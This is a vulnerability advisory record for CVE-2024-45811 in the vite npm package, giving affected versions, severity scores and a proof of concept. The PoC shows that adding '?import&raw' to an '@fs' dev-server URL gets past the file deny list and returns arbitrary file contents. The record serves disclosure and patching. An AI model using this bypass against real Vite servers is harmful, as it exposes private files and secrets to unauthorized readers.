CVE-2024-45811 – vite
Package
Manager: npm
Name: vite
Vulnerable Version: >=5.4.0 <5.4.6 || >=5.3.0 <5.3.6 || >=5.2.0 <5.2.14 || >=4.0.0 <4.5.4 || >=0 <3.2.11 || >=5.0.0 <5.1.8
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS: 0.00047 pctl0.14055
Details
Vite's `server.fs.deny` is bypassed when using `?import&raw` ### Summary The contents of arbitrary files can be returned to the browser. ### Details `@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists. ### PoC ```sh $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev $ echo "top secret content" > /tmp/secret.txt # expected behaviour $ curl "http://localhost:5173/@fs/tmp/secret.txt" <body> <h1>403 Restricted</h1> <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list. # security bypassed $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw" export default "top secret content\n" //# sourceMappingURL=data:application/json;base64,eyJ2... ```
Metadata
Created: 2024-09-17T18:44:12Z
Modified: 2024-09-19T18:34:32Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json
CWE IDs: ["CWE-200", "CWE-284"]
Alternative ID: GHSA-9cwx-2883-4wfx
Finding: F308
Auto approve: 1